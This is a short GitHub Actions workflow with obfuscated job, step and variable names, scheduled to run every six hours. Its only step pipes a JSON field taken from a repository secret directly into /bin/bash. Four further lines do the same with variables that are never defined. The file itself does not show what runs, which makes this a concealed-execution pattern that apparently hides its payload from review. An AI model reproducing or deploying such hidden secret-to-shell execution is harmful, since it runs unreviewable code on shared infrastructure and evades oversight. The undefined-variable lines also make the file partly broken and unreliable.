name: jiangzehong1293
on:
  workflow_dispatch:
  schedule:
    - cron: '2 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangzehong1293
        env:
          znz0656: ${{ secrets.znz0656 }}
        run: |
          echo $znz0656 | jq -r .jhvjs0505 | /bin/bash
          echo $xqya548 | jq -r .utaqz1 | /bin/bash
          echo $tz05394 | jq -r .uktu2 | /bin/bash
          echo $h1 | jq -r .ptxmz78 | /bin/bash
          echo $tgror2 | jq -r .zuv005 | /bin/bash

